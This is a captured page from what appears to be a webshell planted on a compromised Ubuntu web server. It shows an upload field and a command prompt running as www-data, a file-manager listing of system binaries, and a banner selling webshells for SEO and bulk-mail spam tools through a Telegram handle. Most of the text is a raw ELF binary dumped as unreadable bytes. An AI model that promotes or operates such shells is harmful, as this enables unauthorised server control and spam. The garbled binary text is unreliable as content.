__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
ELF> +@�Q@8
@@@@��   ��@@@��HLH\H\� XLX\X\88800hhhDDS�td88800P�td�I�I�IttQ�tdR�tdHLH\H\��/lib64/ld-linux-x86-64.so.2 GNU���GNU!��H$-+��Kt�݉N=`��GNU0Д�a`
I��@0123578<=>?@��k�|�3�r�qX17�v��|�K�k	C���a*v�.���k��hqCE��3b��
:��e�m������5 R#�n��� z�������g,y��B�d���I��|l�, �g�<V��F$`-OS�$V-@`B `vp,�Nha�@5`�H`ap2vp�.��@-Z`; +&7 `X"S�-���/�_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable__libc_start_main__cxa_finalizestderr__fprintf_chkstrncasecmpstrcasecmpgetpwnamfilenofchown__errno_location__vfprintf_chkfputc__stack_chk_fail_exitdst_lib_initdns_rootnamedst_key_generatedst_key_tobufferisc_base64_totextdst_key_freedst_lib_destroyisc_result_totextisc_assertion_failedisc_file_prognameisc_commandline_errprintisc_commandline_parseisc_commandline_argumentisc_mem_debuggingisc_commandline_optionisc_commandline_indexdst_hmac_algorithm_totextisc__mem_create__printf_chkisc__mem_putisc__mem_destroyputsisc_mem_statsstrlenisc__mem_get__snprintf_chkisc_file_safecreatefflushferrorfcloselibisc-9.18.39-0ubuntu0.24.04.2-Ubuntu.solibdns-9.18.39-0ubuntu0.24.04.2-Ubuntu.solibc.so.6set_userverbose__data_start__bss_start_endnotify_edatawrite_key_filefatalalg_fromtextgenerate_keyalg_bits_IO_stdin_usedGLIBC_2.34GLIBC_2.4GLIBC_2.3.4GLIBC_2.2.5����ii
�ti	�ui	�H\,P\�+``�_�_?�_�_�_�_�_�_�_�_"�_'�_/�^�^�^�^�^�^	�^
�^�^
�^�^�^�^�^�^�^____ _(_0_8_ @_!H_#P_$X_%`_&h_(p_)x_*�_+�_,�_-�_.��H��H��?H��t��H����5J>�%L>@��h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f���h�b���f���h	�R���f���h
�B���f���h�2���f���h�"���f���h
����f���h����f���h��f���h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f���h�b���f���h�R���f���h�B���f���h�2���f���h�"���f���h����f���h����f���h��f���h ���f���h!����f���h"����f���h#���f����%.=fD���%�;fD���%�;fD���%�;fD���%�;fD���%�;fD���%�;fD���%�;fD���%�;fD���%�;fD���%�;fD���%�;fD���%�;fD���%�;fD���%�;fD���%�;fD���%~;fD���%v;fD���%n;fD���%f;fD���%^;fD���%V;fD���%N;fD���%F;fD���%>;fD���%6;fD���%.;fD���%&;fD���%;fD���%;fD���%;fD���%;fD���%�:fD���%�:fD���%�:fD���%�:fD���%�:fD��U�H��AWAVAUATA��SH��H��H�>H�5s;dH�%(H�E�1�HDžx����T������FH�-;H�
>;�=7;lH�u�=,;t��DL�(H�5#"L���~�����tH�5"L���k�������ƅW���1���;H�E:A�����L�5�"DžX���L�-�"�HDž`���HDžH���HDžh���ƅV���@L��H��D�������������?��;��IcD�L�>��f��=Y;��H��9H�H��h���밃=9;��H��9H�H��`���됃=;��ƅW����w�����=�:��H�t9H�H��H����M���DH�Y9H�H��H��X�����A�DŽ��P�����X��������H�	9����fDH��8D�A��?tkH��8H�
j9�H�� H�81������H�5l L�������uQƅW�����<����=!9-�����H��H����1��H�tsig-keyH��8��8ygen���H�5 L���G���ƅW����¸������H�
 ��|H�=���ƅV��������=�9uH��7Hc�HH�É
H��h���H��`���tH��H����	���H��7D9 �����E��L��x���D���
���L��I������H��h�����E1�1�1�H������fv�D����X���Dž����!fuB�H��x���H������H������H������Dž����)��������W���t}L������D������L��1�H��h���H�5Y����H��tH��x���Ic�1�H��������V����L�����H�E�dH+%(��H�e�1�[A\A]A^A_]�H�=^�1���L��L��h���L������D������H�5��1�L���#���H��`���H��tsI��H��L��H�5�1����H�=������;���H�6H�
�6�H�FD�H�&6H�81��������H�=�1���H��H���H����H��h���H�56�1��z����z���H��5H��x���H�0��������=37H�0H� HE�H��h���H��`���H��H��tmH��H��8������H��x���1�D�x
Ic�H��@�������L��H��PH��8���1�H��QL��h���H��H��@������ZYH��h������H��H���H��t$H���H��h���H�5�1�������1�E1��H���H��X���H�=�1�����f.���1�I��^H��H���PTE1�1�H�=������4�f.�H�=�4H��4H9�tH�64H��t	�����H�=�4H�5�4H)�H��H��?H��H�H�tH�E4H��t��fD�����=U4u+UH�=�3H��tH�=&4����d����-4]������w����UH��S��H��H�&4�=75H�H��3H�8tH�A�1��u���������H���1��[�����f���U�H�5)H��SH��H������H�5��H�C��HD�H���$����¸������tH�5�H���
����¸������teH�5�H�����¸������tKH�5�H�������¸������t1H�5�H������¸������tH�5�H����������H�]���@����c1�@��w@��H�&���f���UH��ATSH��H���
���H��tD�`H������[�����D���A\]�������������[A\]Ð��UH��SH���H��H���H��P���H��X���L��`���L��h�����t#)�p���)M�)U�)]�)e�)m�)u�)}�dH�%(H��8���H�2�8uH��8���dH+%(ubH�]���f�H��1H�EH��H�� ���H��(����H��@���H�;H��0���Dž ���Dž$���0�u���H�3�
�H�����1���UH��ATI��SH���H��H���H��P���H��X���L��`���L��h�����t#)�p���)M�)U�)]�)e�)m�)u�)}�dH�%(H��8���H�21H��0�H��H�;H�1���H�;H�EL��H��(����H��@���H�� ���Dž ���Dž$���0H��0�����H�3�
�Y���ff.�@��UH��AWAVAUATS��H��dH�%(H�E�1�HDž(���@�����I��A��I��@�����@���t�F_<��A�D$�=��H1�L���T����L�5�H�5�1�L���t�����A��1�H��/H��(���E1�D��H�8jSAUj�F�H�� ���I1�H�5�L���)���f�H�E�H��(����D���H��@����T����p���fv�Dž@���!fuBH��H���DžP���@)�`����S���1�H�51L�������@���!fuB�H��H���L��H��0���H�������H��0�����T�����8����e����1�H�5�L���\���H��(���tH�����%�H�E�dH+%(udH�e�[A\A]A^A_]���B�=��t�����H�=a1�����H�="1���������H�5EH�=7H��1�����������H�5H�=H��1��������H�5H�=�H��1�����H�
1ҾCH�=�u���N�H�5�H�=�H��1��F���D��H�=t1��5���D��UH��AWAVI��AUI��A��ATI��SH��H��(dH�%(H�E�1���H�u�L��H�E�I�������1�H�5VH�=7����M��t:H�E�L��H�E���H����H�}�D�`������D�������tvH���sD�KL��H�}�H��M��1���|�H�}����H�}��j�ZY��uyH�}�����u[H�E�dH+%(uGH�e�[A\A]A^A_]����H�=�1����������H�5yH�=VH��1������L��H�=�1�����L��H�=q1������H��H���Usage:
 %s [-a alg] [-k keyname] [-q] [-s name | -z zone]
  -a alg:        algorithm (default hmac-sha256)
  -k keyname:    name of the key as it will be used in named.conf
  -s name:       domain name to be updated using the created key
  -z zone:       name of the zone as it will be used in named.conf
  -q:            quiet mode: print the key, with no explanatory text
Usage:
 %s [-a alg] [keyname]
  -a alg:        algorithm (default hmac-sha256)

keysize %d out of range (must be 1-512)
keysize %d out of range (must be 1-1024)
../../lib/isc/include/isc/buffer.hThe -r option has been deprecated.# To activate this key, place the following in named.conf, and
# in a separate keyfile on the system or systems from which nsupdate
# will be run:key "%s" {
	algorithm %s;
	secret "%.*s";
};

# Then, in the "zone" statement for the zone containing the
# name "%s", place an "update-policy" statement
# like this one, adjusted as needed for your preferred permissions:
update-policy {
	  grant %s name %s ANY;
};

# Then, in the "zone" definition statement for "%s",
# place an "update-policy" statement like this one, adjusted as 
# needed for your preferred permissions:
update-policy {
	  grant %s zonesub ANY;
};

# Then, in the "zone" statement for each zone you wish to dynamically
# update, place an "update-policy" statement granting update permission
# to this key.  For example, the following statement grants this key
# permission to update any name within the zone:
update-policy {
	grant %s zonesub ANY;
};

# After the keyfile has been placed, the following command will
# execute nsupdate using this key:
nsupdate -k <keyfile>hmac-md5sha1sha224sha256sha384sha512%s: unsupported algorithm %d
initialize dst library%s: %sgenerate keydump key to bufferISC_BUFFER_VALID(b)bsse64 encode secrettsig-keyddns-keytsig-keygentsig-keygen.exeddns-confgenddns-confgen.exeunreachabletsig-keygen.cUnsupported algorithm '%s'%s: invalid argument -%c
%s: unhandled option -%c
a:hk:Mmr:qs:y:z:%s.%screate keyfileunable to set file owner
write to %s failed
fclose(%s) failed
X���������������@��������������������������������������<��������N�������������������;p
|��������������|��l������<��P�|�������� zRx���&D$4���PFJw�?9*3$"\���t���@�h�WA�C
A� ����E�O
A���X�(�d�OE�C
C��j
ET ���E�C
H�}
C0T��E�C
B�K�,P4��E�C
I������
H,�$��VE�H
H����D�I
A,���vE�C
D��E�I�D��
A,�+�� 
�3H\P\���o��
`
�h^`�@h	���o���o����o�of���oX\0 @ P ` p � � � � � � � � !! !0!@!P!`!p!�!�!�!�!�!�!�!�!"" "0"@"P"`"`/usr/lib/debug/.dwz/x86_64-linux-gnu/bind9.debug8DyN�~��+Sq�#yz�K�f1df48242d2bc8c94b74fddd894e3d60e9e08c.debug�q�b.shstrtab.interp.note.gnu.property.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.plt.sec.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.data.bss.gnu_debugaltlink.gnu_debuglink880&hh$9�� G���o���Q``0Y�
�
�a���off�n���o��P}@@h�B��`�  �    P�p"p"��"�"@��$�$&��3�3
�@@�	 ��I�It�JJ��H\HL�P\PL�X\XL�h^hN��`P� `PH PEXP4�P"

Filemanager

Name Type Size Permission Actions
ModemManager File 2.07 MB 0755
a2disconf File 15.75 KB 0755
a2dismod File 15.75 KB 0755
a2dissite File 15.75 KB 0755
a2enconf File 15.75 KB 0755
a2enmod File 15.75 KB 0755
a2ensite File 15.75 KB 0755
a2query File 9.6 KB 0755
aa-load File 38.75 KB 0755
aa-remove-unknown File 3.15 KB 0755
aa-status File 39.06 KB 0755
aa-teardown File 137 B 0755
accessdb File 14.55 KB 0755
add-shell File 1.03 KB 0755
addgnupghome File 3 KB 0755
addgroup File 53.9 KB 0755
adduser File 53.9 KB 0755
agetty File 59.56 KB 0755
apache2 File 736.55 KB 0755
apache2ctl File 7.26 KB 0755
apachectl File 7.26 KB 0755
apparmor_parser File 1.55 MB 0755
apparmor_status File 39.06 KB 0755
applygnupgdefaults File 2.17 KB 0755
argdist-bpfcc File 36 KB 0755
arpd File 26.33 KB 0755
arptables File 219.16 KB 0755
arptables-nft File 219.16 KB 0755
arptables-nft-restore File 219.16 KB 0755
arptables-nft-save File 219.16 KB 0755
arptables-restore File 219.16 KB 0755
arptables-save File 219.16 KB 0755
badblocks File 34.32 KB 0755
bashreadline-bpfcc File 2.32 KB 0755
bashreadline.bt File 698 B 0755
bcache-super-show File 14.3 KB 0755
bindsnoop-bpfcc File 15.96 KB 0755
biolatency-bpfcc File 11.1 KB 0755
biolatency-kp.bt File 664 B 0755
biolatency.bt File 681 B 0755
biolatpcts-bpfcc File 10.01 KB 0755
biopattern-bpfcc File 3.86 KB 0755
biosdecode File 27.2 KB 0755
biosnoop-bpfcc File 10.58 KB 0755
biosnoop.bt File 1.12 KB 0755
biostacks.bt File 915 B 0755
biotop-bpfcc File 9.34 KB 0755
bitesize-bpfcc File 1.14 KB 0755
bitesize.bt File 567 B 0755
blkdeactivate File 15.97 KB 0755
blkdiscard File 22.38 KB 0755
blkid File 54.41 KB 0755
blkzone File 34.38 KB 0755
blockdev File 34.38 KB 0755
bpflist-bpfcc File 2.54 KB 0755
bpftool File 1.58 KB 0755
bridge File 108.49 KB 0755
btrfsdist-bpfcc File 6.47 KB 0755
btrfsslower-bpfcc File 9.75 KB 0755
cache_check File 1.36 MB 0755
cache_dump File 1.36 MB 0755
cache_metadata_size File 1.36 MB 0755
cache_repair File 1.36 MB 0755
cache_restore File 1.36 MB 0755
cache_writeback File 1.36 MB 0755
cachestat-bpfcc File 6.38 KB 0755
cachetop-bpfcc File 9.15 KB 0755
capable-bpfcc File 8.28 KB 0755
capable.bt File 1.88 KB 0755
capsh File 57.09 KB 0755
cfdisk File 94.73 KB 0755
cgdisk File 166.48 KB 0755
chcpu File 30.38 KB 0755
check_forensic File 952 B 0755
chgpasswd File 58.32 KB 0755
chmem File 34.38 KB 0755
chpasswd File 54.43 KB 0755
chroot File 38.51 KB 0755
cobjnew-bpfcc File 53 B 0755
compactsnoop-bpfcc File 11.1 KB 0755
cpgr File 48.45 KB 0755
cppw File 48.45 KB 0755
cpudist-bpfcc File 6.85 KB 0755
cpuunclaimed-bpfcc File 14.59 KB 0755
cpuwalk.bt File 497 B 0755
criticalstat-bpfcc File 8.41 KB 0755
cron File 58.67 KB 0755
cryptdisks_start File 1.51 KB 0755
cryptdisks_stop File 844 B 0755
cryptsetup File 225.9 KB 0755
ctrlaltdel File 14.38 KB 0755
dbconfig-generate-include File 12.36 KB 0755
dbconfig-load-include File 5.57 KB 0755
dbslower-bpfcc File 7.22 KB 0755
dbstat-bpfcc File 3.7 KB 0755
dcb File 80.52 KB 0755
dcsnoop-bpfcc File 4.03 KB 0755
dcsnoop.bt File 1.23 KB 0755
dcstat-bpfcc File 3.77 KB 0755
ddns-confgen File 22.3 KB 0755
deadlock-bpfcc File 20.45 KB 0755
debugfs File 225.87 KB 0755
delgroup File 18.53 KB 0755
deluser File 18.53 KB 0755
depmod File 170.24 KB 0755
devlink File 150.86 KB 0755
dhcpcd File 395.4 KB 0755
dirtop-bpfcc File 8.37 KB 0755
dmeventd File 50.38 KB 0755
dmidecode File 135.25 KB 0755
dmsetup File 171.05 KB 0755
dmstats File 171.05 KB 0755
dosfsck File 78.38 KB 0755
dosfslabel File 38.38 KB 0755
dpkg-preconfigure File 4.25 KB 0755
dpkg-reconfigure File 4.43 KB 0755
drsnoop-bpfcc File 6.73 KB 0755
dumpe2fs File 34.31 KB 0755
e2freefrag File 18.3 KB 0755
e2fsck File 364.34 KB 0755
e2image File 42.31 KB 0755
e2label File 110.56 KB 0755
e2mmpstatus File 34.31 KB 0755
e2scrub File 7.12 KB 0755
e2scrub_all File 5.27 KB 0755
e2undo File 22.3 KB 0755
e4crypt File 30.38 KB 0755
e4defrag File 34.3 KB 0755
ebtables File 219.16 KB 0755
ebtables-nft File 219.16 KB 0755
ebtables-nft-restore File 219.16 KB 0755
ebtables-nft-save File 219.16 KB 0755
ebtables-restore File 219.16 KB 0755
ebtables-save File 219.16 KB 0755
ebtables-translate File 219.16 KB 0755
era_check File 1.36 MB 0755
era_dump File 1.36 MB 0755
era_invalidate File 1.36 MB 0755
era_restore File 1.36 MB 0755
ethtool File 651.68 KB 0755
execsnoop-bpfcc File 9.82 KB 0755
execsnoop.bt File 928 B 0755
exitsnoop-bpfcc File 9.42 KB 0755
ext4dist-bpfcc File 6.53 KB 0755
ext4slower-bpfcc File 9.71 KB 0755
faillock File 22.31 KB 0755
fatlabel File 38.38 KB 0755
fdisk File 114.42 KB 0755
filefrag File 18.32 KB 0755
filegone-bpfcc File 5.64 KB 0755
filelife-bpfcc File 6.38 KB 0755
fileslower-bpfcc File 7.2 KB 0755
filetop-bpfcc File 6.35 KB 0755
findfs File 14.38 KB 0755
fixparts File 58.48 KB 0755
fsadm File 24 KB 0755
fsck File 42.42 KB 0755
fsck.btrfs File 1.16 KB 0755
fsck.cramfs File 30.44 KB 0755
fsck.ext2 File 364.34 KB 0755
fsck.ext3 File 364.34 KB 0755
fsck.ext4 File 364.34 KB 0755
fsck.fat File 78.38 KB 0755
fsck.minix File 54.41 KB 0755
fsck.msdos File 78.38 KB 0755
fsck.vfat File 78.38 KB 0755
fsck.xfs File 2.51 KB 0755
fsfreeze File 14.38 KB 0755
fstab-decode File 14.3 KB 0755
fstrim File 42.38 KB 0755
funccount-bpfcc File 12.68 KB 0755
funcinterval-bpfcc File 5.46 KB 0755
funclatency-bpfcc File 11.28 KB 0755
funcslower-bpfcc File 10.38 KB 0755
gdisk File 198.48 KB 0755
genl File 120.58 KB 0755
getcap File 14.3 KB 0755
gethostlatency-bpfcc File 3.82 KB 0755
gethostlatency.bt File 1.19 KB 0755
getpcaps File 14.3 KB 0755
getty File 59.56 KB 0755
groupadd File 71.13 KB 0755
groupdel File 62.91 KB 0755
groupmems File 58.34 KB 0755
groupmod File 71.04 KB 0755
grpck File 58.32 KB 0755
grpconv File 50.16 KB 0755
grpunconv File 50.16 KB 0755
grub-bios-setup File 958.55 KB 0755
grub-install File 1.17 MB 0755
grub-macbless File 946.41 KB 0755
grub-mkconfig File 8.63 KB 0755
grub-mkdevicemap File 70.69 KB 0755
grub-probe File 954.66 KB 0755
grub-reboot File 4.73 KB 0755
grub-set-default File 3.47 KB 0755
halt File 1.43 MB 0755
hardirqs-bpfcc File 6.85 KB 0755
hdparm File 139.43 KB 0755
httxt2dbm File 14.3 KB 0755
iconvconfig File 34.47 KB 0755
init File 98.45 KB 0755
inject-bpfcc File 16.06 KB 0755
insmod File 170.24 KB 0755
install-sgmlcatalog File 4.44 KB 0755
installkernel File 2.6 KB 0755
integritysetup File 67.06 KB 0755
invoke-rc.d File 16.13 KB 0755
ip File 754.8 KB 0755
ip6tables File 219.16 KB 0755
ip6tables-apply File 6.89 KB 0755
ip6tables-legacy File 92.95 KB 0755
ip6tables-legacy-restore File 92.95 KB 0755
ip6tables-legacy-save File 92.95 KB 0755
ip6tables-nft File 219.16 KB 0755
ip6tables-nft-restore File 219.16 KB 0755
ip6tables-nft-save File 219.16 KB 0755
ip6tables-restore File 219.16 KB 0755
ip6tables-restore-translate File 219.16 KB 0755
ip6tables-save File 219.16 KB 0755
ip6tables-translate File 219.16 KB 0755
iptables File 219.16 KB 0755
iptables-apply File 6.89 KB 0755
iptables-legacy File 92.95 KB 0755
iptables-legacy-restore File 92.95 KB 0755
iptables-legacy-save File 92.95 KB 0755
iptables-nft File 219.16 KB 0755
iptables-nft-restore File 219.16 KB 0755
iptables-nft-save File 219.16 KB 0755
iptables-restore File 219.16 KB 0755
iptables-restore-translate File 219.16 KB 0755
iptables-save File 219.16 KB 0755
iptables-translate File 219.16 KB 0755
iscsi-iname File 18.3 KB 0755
iscsi_discovery File 5.17 KB 0755
iscsiadm File 370.43 KB 0755
iscsid File 286.55 KB 0755
iscsistart File 274.49 KB 0755
isosize File 14.38 KB 0755
iucode-tool File 54.34 KB 0755
iucode_tool File 54.34 KB 0755
javacalls-bpfcc File 55 B 0755
javaflow-bpfcc File 54 B 0755
javagc-bpfcc File 52 B 0755
javaobjnew-bpfcc File 56 B 0755
javastat-bpfcc File 54 B 0755
javathreads-bpfcc File 57 B 0755
kbdrate File 18.31 KB 0755
killall5 File 26.23 KB 0755
killsnoop-bpfcc File 4.45 KB 0755
killsnoop.bt File 873 B 0755
klockstat-bpfcc File 13.04 KB 0755
kpartx File 42.16 KB 0755
kvmexit-bpfcc File 11.19 KB 0755
ldattach File 26.38 KB 0755
ldconfig File 387 B 0755
ldconfig.real File 1 MB 0755
llcstat-bpfcc File 4.48 KB 0755
loads.bt File 1.1 KB 0755
locale-gen File 4.21 KB 0755
logrotate File 94.24 KB 0755
logsave File 14.16 KB 0755
losetup File 74.52 KB 0755
lsmod File 170.24 KB 0755
luksformat File 3.32 KB 0755
lvchange File 3.01 MB 0755
lvconvert File 3.01 MB 0755
lvcreate File 3.01 MB 0755
lvdisplay File 3.01 MB 0755
lvextend File 3.01 MB 0755
lvm File 3.01 MB 0755
lvmconfig File 3.01 MB 0755
lvmdiskscan File 3.01 MB 0755
lvmdump File 10.12 KB 0755
lvmpolld File 235.97 KB 0755
lvmsadc File 3.01 MB 0755
lvmsar File 3.01 MB 0755
lvreduce File 3.01 MB 0755
lvremove File 3.01 MB 0755
lvrename File 3.01 MB 0755
lvresize File 3.01 MB 0755
lvs File 3.01 MB 0755
lvscan File 3.01 MB 0755
lxc File 589 B 0755
lxd File 589 B 0755
make-bcache File 22.38 KB 0755
make-ssl-cert File 6.65 KB 0755
mariadbd File 26.09 MB 0755
mdadm File 622.21 KB 0755
mdflush-bpfcc File 2.24 KB 0755
mdflush.bt File 775 B 0755
mdmon File 258.8 KB 0755
memleak-bpfcc File 20.8 KB 0755
mkdosfs File 50.83 KB 0755
mke2fs File 130.62 KB 0755
mkfs File 14.38 KB 0755
mkfs.bfs File 22.38 KB 0755
mkfs.btrfs File 560.3 KB 0755
mkfs.cramfs File 34.32 KB 0755
mkfs.ext2 File 130.62 KB 0755
mkfs.ext3 File 130.62 KB 0755
mkfs.ext4 File 130.62 KB 0755
mkfs.fat File 50.83 KB 0755
mkfs.minix File 42.39 KB 0755
mkfs.msdos File 50.83 KB 0755
mkfs.ntfs File 66.38 KB 0755
mkfs.vfat File 50.83 KB 0755
mkfs.xfs File 438.99 KB 0755
mkhomedir_helper File 22.34 KB 0755
mkinitramfs File 15.39 KB 0755
mklost+found File 14.3 KB 0755
mkntfs File 66.38 KB 0755
mkswap File 50.38 KB 0755
modinfo File 170.24 KB 0755
modprobe File 170.24 KB 0755
mount.fuse File 18.3 KB 0755
mount.fuse3 File 18.3 KB 0755
mount.lowntfs-3g File 118.98 KB 0755
mount.ntfs File 159.01 KB 0755
mount.ntfs-3g File 159.01 KB 0755
mountsnoop-bpfcc File 14.62 KB 0755
mpathpersist File 31.21 KB 0755
multipath File 34.3 KB 0755
multipathc File 18.3 KB 0755
multipathd File 142.46 KB 0755
mysqld File 26.09 MB 0755
mysqld_qslower-bpfcc File 3.05 KB 0755
named File 574.16 KB 0755
naptime.bt File 1.01 KB 0755
needrestart File 40.13 KB 0755
netfilter-persistent File 1.04 KB 0755
netplan File 802 B 0755
netqtop-bpfcc File 5.59 KB 0755
newusers File 86.96 KB 0755
nfnl_osf File 18.3 KB 0755
nfsdist-bpfcc File 4.95 KB 0755
nfsslower-bpfcc File 13.61 KB 0755
nft File 26.23 KB 0755
nodegc-bpfcc File 52 B 0755
nodestat-bpfcc File 54 B 0755
nologin File 14.3 KB 0755
ntfsclone File 50.38 KB 0755
ntfscp File 30.38 KB 0755
ntfslabel File 22.38 KB 0755
ntfsresize File 62.39 KB 0755
ntfsundelete File 50.38 KB 0755
offcputime-bpfcc File 13.46 KB 0755
offwaketime-bpfcc File 15.31 KB 0755
on_ac_power File 3.7 KB 0755
oomkill-bpfcc File 2.04 KB 0755
oomkill.bt File 1.17 KB 0755
opensnoop-bpfcc File 14.24 KB 0755
opensnoop.bt File 953 B 0755
overlayroot-chroot File 2.45 KB 0755
ownership File 14.45 KB 0755
pam-auth-update File 20.96 KB 0755
pam_extrausers_chkpwd File 26.31 KB 2755
pam_extrausers_update File 34.31 KB 0755
pam_getenv File 2.82 KB 0755
pam_namespace_helper File 467 B 0755
pam_timestamp_check File 14.31 KB 0755
paperconfig File 4.07 KB 0755
parted File 94.4 KB 0755
partprobe File 14.38 KB 0755
pdata_tools File 1.36 MB 0755
perlcalls-bpfcc File 55 B 0755
perlflow-bpfcc File 54 B 0755
perlstat-bpfcc File 54 B 0755
phpcalls-bpfcc File 54 B 0755
phpdismod File 7.11 KB 0755
phpenmod File 7.11 KB 0755
phpflow-bpfcc File 53 B 0755
phpquery File 6.24 KB 0755
phpstat-bpfcc File 53 B 0755
pidpersec-bpfcc File 1.08 KB 0755
pidpersec.bt File 628 B 0755
pivot_root File 14.38 KB 0755
plymouthd File 146.57 KB 0755
poweroff File 1.43 MB 0755
ppchcalls-bpfcc File 13.89 KB 0755
profile-bpfcc File 14.41 KB 0755
pvchange File 3.01 MB 0755
pvck File 3.01 MB 0755
pvcreate File 3.01 MB 0755
pvdisplay File 3.01 MB 0755
pvmove File 3.01 MB 0755
pvremove File 3.01 MB 0755
pvresize File 3.01 MB 0755
pvs File 3.01 MB 0755
pvscan File 3.01 MB 0755
pwck File 54.29 KB 0755
pwconv File 46.16 KB 0755
pwhistory_helper File 22.31 KB 0755
pwunconv File 46.16 KB 0755
pythoncalls-bpfcc File 57 B 0755
pythonflow-bpfcc File 56 B 0755
pythongc-bpfcc File 54 B 0755
pythonstat-bpfcc File 56 B 0755
rdmaucma-bpfcc File 4.95 KB 0755
readahead-bpfcc File 6.54 KB 0755
readprofile File 22.41 KB 0755
reboot File 1.43 MB 0755
remove-shell File 1.08 KB 0755
reset-trace-bpfcc File 3.42 KB 0755
resize2fs File 70.3 KB 0755
resolvconf File 158.67 KB 0755
rmmod File 170.24 KB 0755
rmt File 54.71 KB 0755
rmt-tar File 54.71 KB 0755
rndc File 42.3 KB 0755
rndc-confgen File 22.3 KB 0755
rsyslogd File 771.67 KB 0755
rtacct File 28.31 KB 0755
rtcwake File 34.38 KB 0755
rtmon File 116.52 KB 0755
rubycalls-bpfcc File 55 B 0755
rubyflow-bpfcc File 54 B 0755
rubygc-bpfcc File 52 B 0755
rubyobjnew-bpfcc File 56 B 0755
rubystat-bpfcc File 54 B 0755
runlevel File 1.43 MB 0755
runqlat-bpfcc File 9.3 KB 0755
runqlat.bt File 788 B 0755
runqlen-bpfcc File 8.05 KB 0755
runqlen.bt File 1.01 KB 0755
runqslower-bpfcc File 9.01 KB 0755
runuser File 54.38 KB 0755
service File 8.89 KB 0755
setcap File 14.3 KB 0755
setuids.bt File 1.76 KB 0755
setvesablank File 14.37 KB 0755
setvtrgb File 14.43 KB 0755
sfdisk File 106.38 KB 0755
sgdisk File 178.48 KB 0755
shadowconfig File 2.22 KB 0755
shmsnoop-bpfcc File 7.8 KB 0755
shutdown File 1.43 MB 0755
slabratetop-bpfcc File 6.38 KB 0755
sofdsnoop-bpfcc File 8.06 KB 0755
softirqs-bpfcc File 5.59 KB 0755
solisten-bpfcc File 5.96 KB 0755
split-logfile File 2.36 KB 0755
sshd File 899.82 KB 0755
ssllatency.bt File 2.08 KB 0755
sslsniff-bpfcc File 13.68 KB 0755
sslsnoop.bt File 1.99 KB 0755
stackcount-bpfcc File 16.26 KB 0755
start-stop-daemon File 47.49 KB 0755
statsnoop-bpfcc File 4.92 KB 0755
statsnoop.bt File 1.26 KB 0755
sudo_logsrvd File 248.5 KB 0755
sudo_sendlog File 131.67 KB 0755
sulogin File 42.38 KB 0755
swapin.bt File 600 B 0755
swaplabel File 18.38 KB 0755
swapoff File 22.38 KB 0755
swapon File 42.38 KB 0755
switch_root File 22.38 KB 0755
syncsnoop-bpfcc File 1.27 KB 0755
syncsnoop.bt File 839 B 0755
syscount-bpfcc File 8.57 KB 0755
syscount.bt File 872 B 0755
sysctl File 30.38 KB 0755
tarcat File 936 B 0755
tc File 630.08 KB 0755
tclcalls-bpfcc File 54 B 0755
tclflow-bpfcc File 53 B 0755
tclobjnew-bpfcc File 55 B 0755
tclstat-bpfcc File 53 B 0755
tcpaccept-bpfcc File 9 KB 0755
tcpaccept.bt File 1.71 KB 0755
tcpcong-bpfcc File 20.11 KB 0755
tcpconnect-bpfcc File 18.46 KB 0755
tcpconnect.bt File 1.58 KB 0755
tcpconnlat-bpfcc File 9.07 KB 0755
tcpdrop-bpfcc File 7.44 KB 0755
tcpdrop.bt File 2.41 KB 0755
tcplife-bpfcc File 16.55 KB 0755
tcplife.bt File 2.72 KB 0755
tcpretrans-bpfcc File 13.77 KB 0755
tcpretrans.bt File 2.07 KB 0755
tcprtt-bpfcc File 8.7 KB 0755
tcpstates-bpfcc File 13.73 KB 0755
tcpsubnet-bpfcc File 7.63 KB 0755
tcpsynbl-bpfcc File 2.12 KB 0755
tcpsynbl.bt File 962 B 0755
tcptop-bpfcc File 12.64 KB 0755
tcptracer-bpfcc File 17.71 KB 0755
telinit File 1.43 MB 0755
thermald File 526.73 KB 0755
thin_check File 1.36 MB 0755
thin_delta File 1.36 MB 0755
thin_dump File 1.36 MB 0755
thin_ls File 1.36 MB 0755
thin_metadata_size File 1.36 MB 0755
thin_repair File 1.36 MB 0755
thin_restore File 1.36 MB 0755
thin_rmap File 1.36 MB 0755
thin_trim File 1.36 MB 0755
threadsnoop-bpfcc File 1.81 KB 0755
threadsnoop.bt File 712 B 0755
tipc File 90.52 KB 0755
tplist-bpfcc File 4.06 KB 0755
trace-bpfcc File 42.86 KB 0755
tsig-keygen File 22.3 KB 0755
ttysnoop-bpfcc File 7.51 KB 0755
tune2fs File 110.56 KB 0755
u-d-c-print-pci-ids File 517 B 0755
ucalls File 11.69 KB 0755
uflow File 7.92 KB 0755
ugc File 7.64 KB 0755
umount.udisks2 File 14.3 KB 0755
undump.bt File 789 B 0755
unix_chkpwd File 30.31 KB 2755
unix_update File 34.31 KB 0755
uobjnew File 6.04 KB 0755
update-ca-certificates File 5.32 KB 0755
update-catalog File 9.17 KB 0755
update-fonts-alias File 5.71 KB 0755
update-fonts-dir File 3.98 KB 0755
update-fonts-scale File 6.1 KB 0755
update-grub File 64 B 0755
update-grub-gfxpayload File 301 B 0755
update-grub2 File 64 B 0755
update-gsfontmap File 390 B 0755
update-ieee-data File 3.41 KB 0755
update-info-dir File 1.66 KB 0755
update-initramfs File 6.75 KB 0755
update-locale File 2.99 KB 0755
update-passwd File 34.56 KB 0755
update-pciids File 1.74 KB 0755
update-rc.d File 17.72 KB 0755
update-shells File 3.89 KB 0755
update-xmlcatalog File 16.88 KB 0755
